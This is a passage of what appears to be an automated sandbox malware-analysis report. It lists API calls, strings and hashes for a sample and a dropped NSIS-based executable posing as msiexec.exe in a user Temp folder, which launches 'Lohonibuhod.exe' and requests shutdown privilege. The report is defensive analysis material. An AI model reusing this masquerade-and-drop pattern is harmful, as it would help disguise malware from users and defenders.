__amsg_exit.LIBCMT ref: 00403BBF
__lock.LIBCMT ref: 00403BCF
InterlockedDecrement.KERNEL32(?), ref: 00403BEC
_free.LIBCMT ref: 00403BFF
InterlockedIncrement.KERNEL32(00562B18), ref: 00403C17

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: ef77dee553785f9e1eefaadb346c389977e9e5a0b2e160be006d7c3092e8dbb2
Instruction ID: 4b89cff51d31dcc750218b40562fc0d4efbfb233843013565e2ea479e822e852
Opcode Fuzzy Hash: ef77dee553785f9e1eefaadb346c389977e9e5a0b2e160be006d7c3092e8dbb2
Instruction Fuzzy Hash: ED018E32905621A7DB21AF26990975A7B78AB05B2AF05403FE411B73D2D73C6E81CFCD

Uniqueness

Uniqueness Score: -1.00%

Function 004058A2 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004058B0

Part of subcall function 0040580E: __FF_MSGBANNER.LIBCMT ref: 00405827
Part of subcall function 0040580E: __NMSG_WRITE.LIBCMT ref: 0040582E
Part of subcall function 0040580E: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00404126,00000000,00000001,00000000,?,0040358F,00000018,00407BB0,0000000C,0040361F), ref: 00405853

_free.LIBCMT ref: 004058C3

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 79b783235ddf0561d23002c2b4c80df8f46179e38e11d1e51a4cc4586df10535
Instruction ID: b0c9d25eed03681bba46b06a89ad8b97e27e9f00ebc9b329a604ee99565fb911
Opcode Fuzzy Hash: 79b783235ddf0561d23002c2b4c80df8f46179e38e11d1e51a4cc4586df10535
Instruction Fuzzy Hash: 9F11C472404A15EBCB213B72A80465B3B99DF41375F21443FFD05B62E0EA3C89518EAC

Uniqueness

Uniqueness Score: -1.00%

Function 004038F7 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00403903

Part of subcall function 004021BA: __getptd_noexit.LIBCMT ref: 004021BD
Part of subcall function 004021BA: __amsg_exit.LIBCMT ref: 004021CA

__getptd.LIBCMT ref: 0040391A
__amsg_exit.LIBCMT ref: 00403928
__lock.LIBCMT ref: 00403938
__updatetlocinfoEx_nolock.LIBCMT ref: 0040394C

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: a4d526dbc04fae7416bdbd0cbbd5ca37898f1f9f7701fea917be3d778c5da96a
Instruction ID: 162309ee8381cac5ae95c435e5847bcedeee526b30edb68623fe34d5fc0ab34c
Opcode Fuzzy Hash: a4d526dbc04fae7416bdbd0cbbd5ca37898f1f9f7701fea917be3d778c5da96a
Instruction Fuzzy Hash: 1CF0F672904700AAD721BF76590B70E7BA4AF0472AF10417FF1407A2D2CBBC1A018A4D

Uniqueness

Uniqueness Score: -1.00%

Function 00402E37 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00401BDB), ref: 00402E3A
__malloc_crt.LIBCMT ref: 00402E69
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00402E76

Memory Dump Source

Source File: 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 6db9315cda77603ae6b6e879c7adefdf1762131a3815c6aa2659d402f6a5b4f4
Instruction ID: 495fe5763f833bcfed8b486dfd6288ccedb650f7fc1d67f7aee55d8664e5d2b8
Opcode Fuzzy Hash: 6db9315cda77603ae6b6e879c7adefdf1762131a3815c6aa2659d402f6a5b4f4
Instruction Fuzzy Hash: C2F0E9775441216ACF317734FD4D8572328CAE13653164037F906E73C1F6B88D8182E9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msiexec.exePID: 1948, Parent PID: 2092COMMON

Execution Graph

Execution Coverage:	12%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1217
Total number of Limit Nodes:	23

Executed Functions

Function 004030FA Relevance: 68.5, APIs: 24, Strings: 15, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403119
SetErrorMode.KERNEL32(00008001), ref: 00403124
OleInitialize.OLE32(00000000), ref: 0040312B

Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
Part of subcall function 00405D2E: LoadLibraryA.KERNEL32(?), ref: 00405D4B
Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C

SHGetFileInfoA.SHELL32(00428F98,00000000,?,00000160,00000000,00000008), ref: 00403153

Part of subcall function 00405A0C: lstrcpynA.KERNEL32(?,?,00000400,00403168,0042E360,NSIS Error), ref: 00405A19

GetCommandLineA.KERNEL32(0042E360,NSIS Error), ref: 00403168
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000), ref: 0040317B
CharNextA.USER32(00000000), ref: 004031A6
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403239
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040324E
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040325A
DeleteFileA.KERNEL32(1033), ref: 0040326D
ExitProcess.KERNEL32(00000000), ref: 004032E6
OleUninitialize.OLE32 ref: 004032EB
ExitProcess.KERNEL32 ref: 0040330B
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000,00000000), ref: 00403317
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\MSI,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000,00000000), ref: 00403323
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040332F
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403336
DeleteFileA.KERNEL32(00428B98,00428B98,?,0042F000,?), ref: 00403380
CopyFileA.KERNEL32 ref: 00403394
CloseHandle.KERNEL32(00000000), ref: 004033C1
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403416
ExitWindowsEx.USER32(00000002,00000000), ref: 00403452
ExitProcess.KERNEL32 ref: 00403475

Strings

1033, xrefs: 00403268
/D=, xrefs: 004031FC
Error launching installer, xrefs: 004032A3
SeShutdownPrivilege, xrefs: 00403428
", xrefs: 004031C8
NCRC, xrefs: 004031E6
C:\Users\user\AppData\Local\Temp, xrefs: 004032C8
C:\Users\user\AppData\Local\Temp\, xrefs: 0040322E, 00403233, 0040324D, 00403259, 00403316, 00403322, 0040332E, 00403335, 004033D5
~nsu.tmp, xrefs: 00403311
\Temp, xrefs: 00403254
"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" , xrefs: 0040316E, 00403174, 0040328A
C:\Users\user\AppData\Local\Temp\MSI, xrefs: 0040331C, 00403321, 00403344
C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe, xrefs: 0040338F
_?=, xrefs: 00403294
NSIS Error, xrefs: 00403159

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MSI$C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 553446912-3161323543
Opcode ID: b54f9db6f0d8b9b5cada0f3be399c619291e87e839e1cbb66da7d28003e7be7a
Instruction ID: 1e9e478c3a9e7f3573a82b9cae4fcf3dc9ecc54075f91e84b1854e8c20532e3f
Opcode Fuzzy Hash: b54f9db6f0d8b9b5cada0f3be399c619291e87e839e1cbb66da7d28003e7be7a
Instruction Fuzzy Hash: 4191D130A08344AFE7216F61AD4AB6B7E9CEB0530AF04057FF541B61D2C77C99058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405331 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNEL32(?,?,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000), ref: 0040534F
lstrcatA.KERNEL32(0042AFE8,\*.*,0042AFE8,?,00000000,?,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000), ref: 00405399
lstrcatA.KERNEL32(?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000), ref: 004053BA
lstrlenA.KERNEL32(?,?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000), ref: 004053C0
FindFirstFileA.KERNEL32(0042AFE8,?,?,?,00409010,?,0042AFE8,?,00000000,?,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000), ref: 004053D1
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405483
FindClose.KERNEL32(?), ref: 00405494

Strings

\*.*, xrefs: 00405393
C:\Users\user\AppData\Local\Temp\, xrefs: 00405331
"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" , xrefs: 0040533B

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2130711221
Opcode ID: eeee1fe6d78b479acfa35fd6cd9b42f31f1d942e4a3e46f321804d068e117fb2
Instruction ID: 46a167c19d0f92bb62e791f7a1b0a3e0954e7dde2177130d433e16ae92940f3d
Opcode Fuzzy Hash: eeee1fe6d78b479acfa35fd6cd9b42f31f1d942e4a3e46f321804d068e117fb2
Instruction Fuzzy Hash: 84510130904A5476DB21AB218C85BFF3A68DF4231AF14813BF941752D2C77C49C2DE5E

Uniqueness

Uniqueness Score: -1.00%

Function 00405D07 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32(?,0042C030,0042B3E8,00405623,0042B3E8,0042B3E8,00000000,0042B3E8,0042B3E8,?,?,00000000,00405345,?,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000), ref: 00405D12
FindClose.KERNEL32(00000000), ref: 00405D1E

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 0ba34ad688579e7913e3aeb04dcfdbb9c24dd4cd636fec125d72bd6057fbbed4
Instruction ID: 6bc8dc8487d68019062fb65c0caa7a5850599756ae9c65598668cc32d68c0862
Opcode Fuzzy Hash: 0ba34ad688579e7913e3aeb04dcfdbb9c24dd4cd636fec125d72bd6057fbbed4
Instruction Fuzzy Hash: C5D0123195D5309BD31017797C0C85B7A58DF293317108A33F025F22E0D3749C519AED

Uniqueness

Uniqueness Score: -1.00%

Function 00402C22 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32("C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000,00000000), ref: 00402C33
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe,00000400), ref: 00402C4F

Part of subcall function 004056E3: GetFileAttributesA.KERNEL32(00000003,00402C62,C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe,80000000,00000003), ref: 004056E7
Part of subcall function 004056E3: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405709

GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\AppData\Local\Temp\MSI,C:\Users\user\AppData\Local\Temp\MSI,C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe,C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe,80000000,00000003), ref: 00402C9B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00402C22
Inst, xrefs: 00402D07
Error launching installer, xrefs: 00402C72
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DFA
soft, xrefs: 00402D10
"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" , xrefs: 00402C2C
C:\Users\user\AppData\Local\Temp\MSI, xrefs: 00402C7D, 00402C82, 00402C88
C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe, xrefs: 00402C39, 00402C48, 00402C5C, 00402C7C
Null, xrefs: 00402D19

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\MSI$C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-782581025
Opcode ID: 1aa0d1efbed9786f842be751fafdabbb11e6860e74167932e572fcfd279c9ed7
Instruction ID: 5cdc40c0d59b83eec34e45f83230a383a342561faf5f4e8ee161a7b3089b1b43
Opcode Fuzzy Hash: 1aa0d1efbed9786f842be751fafdabbb11e6860e74167932e572fcfd279c9ed7
Instruction Fuzzy Hash: 40512371A00214ABDB20DF61DE89B9E7BA8EF04329F10413BF905B62D1D7BC9D418B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402E5B Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EC2
GetTickCount.KERNEL32(?YA,00414B88,00004000), ref: 00402F69
MulDiv.KERNEL32 ref: 00402F92
wsprintfA.USER32 ref: 00402FA2
WriteFile.KERNEL32(00000000,00000000,0041D988,7FFFFFFF,00000000), ref: 00402FD0

Strings

... %d%%, xrefs: 00402F9C
?YA, xrefs: 00402F2F, 00402F41

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%$?YA
API String ID: 4209647438-2008082034
Opcode ID: 41e35a0a14bb3f2fd38d9c716afd6c3ba0ace6c0ea9dec4adf0e27dc0e0f292a
Instruction ID: 0d39cdfb2b20f01ea0ef459ff81ac6f09524c508dd7874cbed1e127a204ff5ac
Opcode Fuzzy Hash: 41e35a0a14bb3f2fd38d9c716afd6c3ba0ace6c0ea9dec4adf0e27dc0e0f292a
Instruction Fuzzy Hash: 3D618D7190121AEBDF10CF65DA44A9E7BB8EF04366F10413BF800B72D4D7789A51DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401734 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,00409B80,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,00409B80,00409B80,00000000,00000000,00409B80,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405A0C: lstrcpynA.KERNEL32(?,?,00000400,00403168,0042E360,NSIS Error), ref: 00405A19

Part of subcall function 00404DAA: lstrlenA.KERNEL32(004297B8,00000000,0041D988,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
Part of subcall function 00404DAA: lstrlenA.KERNEL32(00402FB6,004297B8,00000000,0041D988,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
Part of subcall function 00404DAA: lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,0041D988,756F110C), ref: 00404E06
Part of subcall function 00404DAA: SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E3E
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E58
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E66

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401761
open Lohonibuhod.exe, xrefs: 00401801, 0040181D
fd , xrefs: 0040177E, 004017ED, 0040180B

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$fd $open Lohonibuhod.exe
API String ID: 1941528284-1897024734
Opcode ID: f324c85fc2f324614552c21af61c380c89f90457e6ef3776ce2ffda22f3967b2
Instruction ID: 2412d90e5cc6ef50ac46e2462e63b4f26081636668b1d4f665875a47291bc265
Opcode Fuzzy Hash: f324c85fc2f324614552c21af61c380c89f90457e6ef3776ce2ffda22f3967b2
Instruction Fuzzy Hash: 4341D831A10515BACF10BBB5DD86DAF3A69EF41328B24433BF511F11E2D67C4A418E6D

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405593: CharNextA.USER32(ES@), ref: 004055A1
Part of subcall function 00405593: CharNextA.USER32(00000000), ref: 004055A6
Part of subcall function 00405593: CharNextA.USER32(00000000), ref: 004055B5

CreateDirectoryA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-2935972921
Opcode ID: d0bac1e6b020b5001be7ab41a75496c2f01233b398ddf1ad5a6b7401c24eee4e
Instruction ID: bf1eb0eabc3c1df6ff2fb323ed3efcd7168262dea338722757ad05095e7f5395
Opcode Fuzzy Hash: d0bac1e6b020b5001be7ab41a75496c2f01233b398ddf1ad5a6b7401c24eee4e
Instruction Fuzzy Hash: AB012631908180AFDB217F756D449BF6BB0EA56365728073FF492B22E2C23C4D42962E

Uniqueness

Uniqueness Score: -1.00%

Function 00405712 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32("C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004030F8,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405725
GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 0040573F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405712, 00405715
nsa, xrefs: 0040571E
"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" , xrefs: 00405719

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
